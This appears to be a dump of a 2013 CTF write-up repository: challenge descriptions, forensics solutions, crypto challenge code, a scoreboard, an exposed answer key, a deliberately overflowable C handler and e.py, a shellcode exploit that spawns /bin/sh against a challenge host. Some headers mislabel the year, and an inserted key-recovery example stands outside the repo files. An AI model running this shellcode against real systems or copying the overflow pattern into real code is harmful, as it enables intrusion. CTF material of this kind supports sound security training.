17 | >
18 | >
19 | > The flag is the MD5 of the decrypted text.
20 | >
21 | >
22 | > HINT: Sometimes the most direct approach gives the answer
23 |
24 | ## Write-up
25 |
26 | (TODO)
27 |
28 | ## Other write-ups and resources
29 |
30 | * none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/crypto/75/README.md:
--------------------------------------------------------------------------------
1 | # Backdoor CTF 2013: Crypto 75
2 |
3 | **Category:** Crypto
4 | **Points:** 75
5 | **Solves:**
6 | **Description:**
7 |
8 | > Decrypt this string 'RIVXR ITWZV OHVFM HVBMV HFVHC GLHEG RZHVR VS'
9 | >
10 | > Flag is the MD5 of decoded string.
11 | >
12 | > May the Force be with you !
13 | >
14 | > HINT: Wait a sec! was that Force or Source!
15 |
16 | ## Write-up
17 |
18 | (TODO)
19 |
20 | ## Other write-ups and resources
21 |
22 | * none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/150/README.md:
--------------------------------------------------------------------------------
1 | # Backdoor CTF 2013: Forensics 150
2 |
3 | **Category:** Forensics
4 | **Points:** 150
5 | **Solves:**
6 | **Description:**
7 |
8 | > H4x0r decided he needs one more extra layer of advanced security. His access key is a QR code, and keeps the only copy in his wallet. But when leaving his castle he fell into the moat and the QR code got wet and disfigured. Now he can't get back into his own castle and desperately needs a real hacker's help. His post on craigslist says so. This is your chance to get into his head.
9 | >
10 | > Here is the disfigured QR code:-
11 | >
12 | > The Flag is md5 of last 13 characters of password hidden in [the QR](wet_QR.png).
13 | >
14 | > H4x0r promises to reward 150 h4x0rcoins anyone who gives him the password.
15 | >
16 | > HINT: Hmmm... Can't I just try and reverse the fading somehow?
17 |
18 | ## Write-up
19 |
20 | (TODO)
21 |
22 | ## Other write-ups and resources
23 |
24 | * none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/150/wet_QR.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/150/wet_QR.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/README.md:
--------------------------------------------------------------------------------
1 | # Backdoor CTF 2013: Forensics 250
2 |
3 | **Category:** Forensics
4 | **Points:** 250
5 | **Solves:**
6 | **Description:**
7 |
8 | > h4x0r is fed up with all your attacks on his castle and has decided to retaliate by attacking us back. He sent us a mail with [this image](bbb.png) as a warning. Hope you can figure out his warning message:-
9 | >
10 | > MD5 of the message is the answer.
11 |
12 | ## Write-up
13 |
14 | We are given a picture:
15 |
16 | 
17 |
18 | Using `stegsolve`, we see that this picture contains a hidden binary text:
19 |
20 | 
21 |
22 | Extract these bits and convert them to `0`s and `1`s with this [script](get.py):
23 |
24 | ```bash
25 | $ python get.py
26 | 011011010110111101100100011001010111001001101110011101110110000101110010011001100110000101110010011001010000000000000000000000000000
27 | ```
28 |
29 | We convert the binary output to ASCII text using a small perl command and pipe the output to `xxd` to avoid scrambling our shell:
30 |
31 | ```bash
32 | $ python get.py | perl -lpe '$_=pack"B*",$_' | xxd
33 | 0000000: 6d6f 6465 726e 7761 7266 6172 6500 0000 modernwarfare...
34 | 0000010: 000a
35 | ```
36 |
37 | MD5 the resulting readable text and you get the flag:
38 |
39 | ```bash
40 | $ echo modernwarfare | md5
41 | 3c87b2bc2f0e1143ecb67aa8570ffc1b
42 | $ echo -n modernwarfare | md5
43 | d2432052b887f9e09fb8fa44b11861ef
44 | ```
45 |
46 | The flag is either `3c87b2bc2f0e1143ecb67aa8570ffc1b` or `d2432052b887f9e09fb8fa44b11861ef`.
47 | ## Other write-ups and resources
48 |
49 | * none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/bbb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/250/bbb.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/get.py:
--------------------------------------------------------------------------------
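1 | from PIL import Image
2 |
3 | # Bit-plane image in which the hidden row of bits is visible
4 | flag_img = Image.open("solved.bmp")
5 | w, h = flag_img.size
6 | msg = ''
7 | # Walk along the top row (y = 0), one pixel per bit
8 | for x in range(0, flag_img.size[1]):
9 |     g, b, a = flag_img.getpixel((x, 0))
10 |     # A first channel value of 255 encodes a 0 bit, anything else a 1 bit
11 |     if g == 255:
12 |         msg += '0'
13 |     else:
14 |         msg += '1'
15 | print(msg)
16 |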
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/solved.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/250/solved.bmp
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/0.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/1.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/README.md:
--------------------------------------------------------------------------------
1 | # Backdoor CTF 2013: Forensics 300
2 |
3 | **Category:** Forensics
4 | **Points:** 300
5 | **Solves:**
6 | **Description:**
7 |
8 | > H4x0r has now learnt that simple text authentications are not the in thing today. Also since voice authentication is all the rage nowadays thanx to siri, he decided to get one for his castle. But he messed it big time and now has an audio file which he himself can't seem to decipher. So now he needs your help to get into his own castle.
9 | >
10 | > You can find the file [here](siri_audio.zip).
11 | >
12 | > Find the hidden passphrase, the flag is the MD5 of the passphrase.
13 | >
14 | > HINT: It is an audioWAVE. Sometimes you might have to see things instead of hearing them.
15 |
16 | ## Write-up
17 |
18 | This writeup is based on [h34dump](http://h34dump.com/2013/03/backdoorctf-2013-forensics-300/)'s writeup.
19 |
20 | We are given an audio WAVE file; opening it with `audacity` shows this waveform:
21 |
22 | 
23 |
24 | We see that there are six groups of 16 spikes / 8 sine waves and infer that we can decode the waves:
25 |
26 | 
27 |
28 | as `0`
29 |
30 | and
31 |
32 | 
33 |
34 | as `1`.
35 |
36 | This results in the bitstream `011000100110000101101011011001000110111101110010`, which can be translated into ASCII characters using a simple perl command:
37 |
38 |
39 | ```bash
40 | $ echo 011000100110000101101011011001000110111101110010 | perl -lpe '$_=pack"B*",$_'
41 | bakdor
42 | $ echo -n bakdor | md5
43 | e1b64df17443b51e3007fd3d5370dca1
44 | ```
45 |
46 | The flag is `e1b64df17443b51e3007fd3d5370dca1`.
47 |
48 | ## Other write-ups and resources
49 |
50 | *
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/siri_audio.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/siri_audio.zip
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/writeup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/writeup.png
--------------------------------------------------------------------------------
/backdoorctf-2013/scoreboard.txt:
--------------------------------------------------------------------------------
1 | dcua 3815.000
2 | v3l0cityz3r0 3720.000
3 | Headump 3640.000
4 | p!r@t3s 3590.000
5 | Got Root 3515.000
6 | dnivra 3250.000
7 | botnet 3250.000
8 | sbi0s 3250.000
9 | bi0s 3250.000
10 | hellokitty 3225.000
11 | sakshi 3225.000
12 | 2sbi0s 3175.000
13 | 1338-offbyone 3175.000
14 | Beginbi0s 3100.000
15 | Inception 3050.000
16 | Graphite 2925.000
17 | NULL Life 2475.000
18 | ChocolateMakers 1850.000
19 | Akrockzzz 1550.000
20 | YouKnowWho 1425.000
21 | SsoMac 1400.000
22 | Inquisitive 1290.000
23 | hczi0npqu 1275.000
24 | webfuel 1225.000
25 | Rising Force 1200.000
26 | WeLoveCP 1200.000
27 | jayant 1120.000
28 | Testing 1120.000
29 | abhshkdz 1050.000
30 | weareplaying 1050.000
31 | 0x01 1000.000
32 | LOOLOO 1000.000
33 | bithin 975.000
34 | deception 900.000
35 | ufologists 850.000
36 | OneManTeam 775.000
37 | p03p0wn 650.000
38 | Protocol 625.000
39 | PR0T0C0L 625.000
40 | bond 600.000
41 | pwners 500.000
42 | xelenonz 500.000
43 | h4x0r 500.000
44 | MyTeam 425.000
45 | jofrutas 400.000
46 | w0rmicelli 400.000
47 | Spounchers 375.000
48 | redeemer 350.000
49 | The DHARMA Initiative 300.000
50 | pouet 300.000
51 | Nemotest 225.000
52 | Big Boss 200.000
53 | TSTORMXSD 200.000
54 | hack_123 200.000
55 | zorianix 150.000
56 | lolcode 140.000
57 | hawk_eye 50.000
58 | delirium 50.000
59 | A-Team 50.000
60 | Nuts 50.000
61 | TeamNuts 50.000
62 | nk_team 50.000
63 | L0L 50.000
64 | trackdown 50.000
65 | achilles 50.000
66 | D3molition 50.000
67 | Army Ants 50.000
68 | BOTNET_OM 50.000
69 | backdoor 50.000
70 | empire 50.000
71 | ANONYMOUS 50.000
72 | The Agents 50.000
73 | dumbass 50.000
74 | knightwave 50.000
75 | KISS 50.000
76 | oioioi 50.000
77 | GoDFathER 50.000
78 | theDuffers 50.000
79 | dvjbndlsh93 50.000
80 | paglab 20.000
81 |
--------------------------------------------------------------------------------
/csaw-quals-2013/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF write-ups
2 |
3 | *
4 | * [Scoreboard](https://ctftime.org/event/96) or [here](scoreboard.txt)
5 | * [Number of solves per task](solves.txt)
6 |
7 | ## Completed write-ups
8 |
9 | * [misc/black-and-white-100](misc/black-and-white-100)
10 | * [misc/deeeeeeaaaaaadbeeeeeeeeeef-200](misc/deeeeeeaaaaaadbeeeeeeeeeef-200)
11 | * [misc/network1-50](misc/network1-50)
12 | * [misc/network2-50](misc/network2-50)
13 |
14 | ## External write-ups only
15 |
16 | * none yet
17 |
18 | ## Missing write-ups
19 |
20 | * [crypto/csawpad-100](crypto/csawpad-100)
21 | * [crypto/onlythisprogram-300](crypto/onlythisprogram-300)
22 | * [crypto/slurp-500](crypto/slurp-500)
23 | * [exploitation/csawdiary-300](exploitation/csawdiary-300)
24 | * [exploitation/exploit1-100](exploitation/exploit1-100)
25 | * [exploitation/exploit2-200](exploitation/exploit2-200)
26 | * [exploitation/miteegashun-400](exploitation/miteegashun-400)
27 | * [exploitation/scp-hack-500](exploitation/scp-hack-500)
28 | * [misc/life-300](misc/life-300)
29 | * [reversing/bikinibonanza-150](reversing/bikinibonanza-150)
30 | * [reversing/crackme-300](reversing/crackme-300)
31 | * [reversing/csaw2013reversing1-100](reversing/csaw2013reversing1-100)
32 | * [reversing/csaw2013reversing2-200](reversing/csaw2013reversing2-200)
33 | * [reversing/dotnet-100](reversing/dotnet-100)
34 | * [reversing/impossible-500](reversing/impossible-500)
35 | * [reversing/keygenme-400](reversing/keygenme-400)
36 | * [reversing/noobs-first-firmware-mod-500](reversing/noobs-first-firmware-mod-500)
37 | * [web/cryptomatv2-400](web/cryptomatv2-400)
38 | * [web/guess-harder-100](web/guess-harder-100)
39 | * [web/herpderper-300](web/herpderper-300)
40 | * [web/nevernote-200](web/nevernote-200)
41 | * [web/widgetcorp-400](web/widgetcorp-400)
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/csawpad-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CSAWpad
2 |
3 | **Category:** Crypto
4 | **Points:** 100
5 | **Solves:** 141
6 | **Description:**
7 |
8 | > [csawpad.py](csawpad.py)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: onlythisprogram
2 |
3 | **Category:** Crypto
4 | **Points:** 300
5 | **Solves:** 127
6 | **Description:**
7 |
8 | > [onlythisprogram.tgz](onlythisprogram.tgz)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/onlythisprogram.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/onlythisprogram.tgz
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/README:
--------------------------------------------------------------------------------
1 | QUESTION TEXT:
2 |
3 | I tested out my new encryption tool on some files from the internet and it seems like it worked pretty good. What do you think?
4 |
5 | FILE: onlythisprogram.tgz
6 |
7 | HINT (if necessary):
8 |
9 | You don't have to figure out the whole key to solve the challenge. Some file formats make better oracles than others.
10 |
11 | SOLVE:
12 |
13 | See solve.py for my half-solution with explanation.
14 |
15 | KEY:
16 |
17 | BuildYourOwnCryptoSoOthersHaveJobSecurity
18 |
19 | echo "For some reason psifertex really likes figlets. In this case it's necessary because the file size should not be a huge giveaway. Though I suppose images would have worked too. Anyway, the key is: BuildYourOwnCryptoSoOthersHaveJobSecurity"|sed 's/ / /g'|figlet -w 3000|gzip > key
20 |
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Hackers.mid:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Hackers.mid
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Tux_ecb.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Tux_ecb.jpg
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/diagram.png
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/enigma.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/enigma.jpg
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/key.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/key.gz
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/linux-penguin5_blastfishing_com.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/linux-penguin5_blastfishing_com.bmp
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/logo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/logo.gif
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/nelson.doc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/nelson.doc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/shannon1948.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/shannon1948.pdf
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/onlythisprogram.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import os
3 | import sys
4 | import argparse
5 |
6 | blocksize=256
7 |
8 | parser = argparse.ArgumentParser(description="Custom encryption algorithm because a friend said that's the way to do it. Anyway, it's called 'Only This Program' since I'm pretty sure that only this program can securely decrypt the files as long as you don't give out your secret.dat file created when you encrypt something.")
9 | parser.add_argument('--infile', metavar='i', nargs='?', type=argparse.FileType('r'), help='input file, defaults to standard in', default=sys.stdin)
10 | parser.add_argument('--outfile', metavar='o', nargs='?', type=argparse.FileType('wb'), help='output file, defaults to standard out', default=sys.stdout)
11 | parser.add_argument('--secretkey', metavar='s', nargs='?', type=argparse.FileType('a+'), help='output file, defaults to secretkey.dat', default='secretkey.dat')
12 |
13 | args = parser.parse_args()
14 |
15 |
16 | sys.stderr.write('\nReading random bytes from OS. If hung, please introduce entropy.\n')
17 |
18 | args.secretkey.truncate()
19 |
20 | while (args.secretkey.tell() < blocksize):
21 |     # maybe remove the next line for release since it makes it more obvious the key only generates once?
22 |     sys.stdout.write('.')
23 |     args.secretkey.write(os.urandom(1))
24 |
25 | counter=0
26 | args.secretkey.seek(0)
27 | keydata = args.secretkey.read(blocksize)
28 |
29 | while 1:
30 |     byte = args.infile.read(1)
31 |     if not byte:
32 |         break
33 |     args.outfile.write(chr(ord(keydata[counter % len(keydata)]) ^ ord(byte)))
34 |     counter+=1
35 |
36 | sys.stderr.write('\nSecret keyfile: %s\nInput file: %s\nOutput file: %s\nTotal bytes: %d \n' % (args.secretkey.name, args.infile.name, args.outfile.name, counter))
37 |
38 |
39 |
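The weakness the README hint points at, shown as an added example (not code from the challenge repository or its `solve.py`): `onlythisprogram.py` XORs every file with the same repeating 256-byte key, so one file's fixed header discloses the key bytes at those offsets for every file. The key, the sample files and all function names below are constructed for illustration.

```python
# Added example: known-header key recovery against a reused repeating-XOR key.
# All sample data is constructed; nothing is read from the challenge files.
BLOCKSIZE = 256  # key length used by onlythisprogram.py

# Bytes that every file of the given type starts with.
MAGIC = {
    "png":  b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",  # signature + mandatory first chunk
    "pdf":  b"%PDF-1.",
    "gif":  b"GIF8",
    "jpeg": b"\xff\xd8\xff",
    "bmp":  b"BM",
    "midi": b"MThd\x00\x00\x00\x06",
    "gzip": b"\x1f\x8b\x08",
    "ole2": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",     # legacy .doc container
}


def xor(a, b):
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(data, key):
    """Same operation as onlythisprogram.py: XOR with the key repeated."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_known_format(plain):
    """True if `plain` agrees with some signature on their overlapping bytes."""
    return bool(plain) and any(
        plain[:len(m)] == m[:len(plain)] for m in MAGIC.values()
    )


def recover_key_prefix(ciphertexts):
    """Return (key_prefix, format) for the longest guess under which every
    ciphertext decrypts to the start of a known file format."""
    best = (b"", None)
    for ct in ciphertexts:
        for name, magic in MAGIC.items():
            guess = xor(ct, magic)  # key bytes implied if ct is this format
            if all(looks_like_known_format(xor(c, guess)) for c in ciphertexts):
                if len(guess) > len(best[0]):
                    best = (guess, name)
    return best


def partial_decrypt(ct, key_prefix, blocksize=BLOCKSIZE, unknown=ord("?")):
    """Decrypt the offsets covered by key_prefix in every key period and
    mask the remaining bytes with `unknown`."""
    out = bytearray()
    for i, b in enumerate(ct):
        k = i % blocksize
        out.append(b ^ key_prefix[k] if k < len(key_prefix) else unknown)
    return bytes(out)


def demo():
    # Constructed stand-in for secretkey.dat (the real key is random).
    key = bytes((i * 73 + 41) % 256 for i in range(BLOCKSIZE))
    # Constructed plaintexts that only carry realistic headers.
    files = [
        MAGIC["png"] + bytes(300),
        b"%PDF-1.4\n" + b"% constructed sample body\n" * 12,
        b"GIF89a" + bytes(40),
    ]
    cts = [encrypt(f, key) for f in files]
    prefix, fmt = recover_key_prefix(cts)
    return key, files, cts, prefix, fmt


if __name__ == "__main__":
    key, files, cts, prefix, fmt = demo()
    print("recovered %d key bytes via the %s header" % (len(prefix), fmt))
    # The same 16 offsets are exposed again in every 256-byte period.
    print(partial_decrypt(cts[1], prefix)[250:280])
```

A per-file random nonce combined with a real stream cipher or AEAD removes this property; a longer XOR key does not.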
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file0.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file0.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file1.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file1.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file2.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file2.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file3.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file3.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file4.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file4.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file5.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file5.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file6.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file6.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file7.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file7.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file8.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file8.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/runme.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | rm -rf output
3 | mkdir output
4 | rm secretkey.dat
5 | for file in input/*
6 | do
7 |     ./onlythisprogram.py --infile "$file" --outfile output/file$((COUNT++)).enc
8 | done
9 |
10 |
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/secretkey.dat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/secretkey.dat
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/slurp-500/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: slurp
2 |
3 | **Category:** Crypto
4 | **Points:** 500
5 | **Solves:** 27
6 | **Description:**
7 |
8 | > We've found the source to the Arstotzka spies rendezvous server, we must find out their new vault key.
9 | >
10 | > [slurp.py](slurp.py)
11 | >
12 | > nc 128.238.66.222 7788
13 |
14 | ## Write-up
15 |
16 | (TODO)
17 |
18 | ## Other write-ups and resources
19 |
20 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/csawdiary-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CSAW Diary
2 |
3 | **Category:** Exploitation
4 | **Points:** 300
5 | **Solves:** 116
6 | **Description:**
7 |
8 | > nc 128.238.66.217 34266
9 | >
10 | > [fil_chal](fil_chal)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/csawdiary-300/fil_chal:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/csawdiary-300/fil_chal
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit1-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Exploitation 1
2 |
3 | **Category:** Exploitation
4 | **Points:** 100
5 | **Solves:** 701
6 | **Description:**
7 |
8 | > nc 128.238.66.212 31337
9 | >
10 | > [exploit1](exploit1)
11 | >
12 | > [exploit1.c](exploit1.c)
13 |
14 | ## Write-up
15 |
16 | (TODO)
17 |
18 | ## Other write-ups and resources
19 |
20 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit1-100/exploit1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/exploit1-100/exploit1
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit1-100/exploit1.c:
--------------------------------------------------------------------------------
1 | [snip]
2 |
3 | void handle(int newsock) {
4 |     int backdoor = 0;
5 |     char buffer[1016];
6 |     memset(buffer, 0, 1016);
7 |
8 |     send(newsock, "Welcome to CSAW CTF.", 21, 0);
9 |     recv(newsock, buffer, 1020, 0);  /* accepts up to 1020 bytes into the 1016-byte buffer */
10 |     buffer[1015] = 0;
11 |
12 |     if ( backdoor ) {
13 |         fd = fopen("./key", "r");
14 |         fscanf(fd, "%s\n", buffer);
15 |         send(newsock, buffer, 512, 0);
16 |     }
17 |     close(newsock);
18 | }
19 |
20 | [snip]
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit2-200/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Exploitation 200
2 |
3 | **Category:** Exploitation
4 | **Points:** 200
5 | **Solves:** 198
6 | **Description:**
7 |
8 | > nc 128.238.66.212 31338
9 | >
10 | > [exploit2](exploit2)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit2-200/e.py:
--------------------------------------------------------------------------------
1 | import socket
2 |
3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4 | s.connect(("128.238.66.212", 31338))
5 |
6 | i = s.recv(4)
7 | j = s.recv(4)
8 | print s.recv(100)
9 |
10 | payload = (("\x90"*100) +
11 | ("\x89\xe1\x66\x31\xc9\x31\xdb\xb3\x14\x31\xd2\xb2\x04\x4b\x75\x02\xcd\x03\x31\xc0\xb0\x03\xcd\x80\x3c\x04\x75\xf1\x81\x39\x0d\xf0\xfe\xca\x75\xe9\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x31\xd2\xcd\x80") +
12 | (j*473) +
13 | (i*10))
14 |
15 | s.send(payload)
16 | s.send("\x0d\xf0\xfe\xca")
17 | s.send("cat key\n")
18 | print s.recv(100)
19 |
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit2-200/exploit2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/exploit2-200/exploit2
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/miteegashun-400/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: miteegashun
2 |
3 | **Category:** Exploitation
4 | **Points:** 400
5 | **Solves:** 85
6 | **Description:**
7 |
8 | > nc 128.238.66.221 5930
9 | >
10 | > [miteegashun](miteegashun)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/miteegashun-400/miteegashun:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/miteegashun-400/miteegashun
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/scp-hack-500/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: SCP-hack
2 |
3 | **Category:** Exploitation
4 | **Points:** 500
5 | **Solves:** 7
6 | **Description:**
7 |
8 | > The SCP organization (http://128.238.66.211:45000) wants you to join, accept and see if you can take advantage of their interns sloppy coding and outdated browser.
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
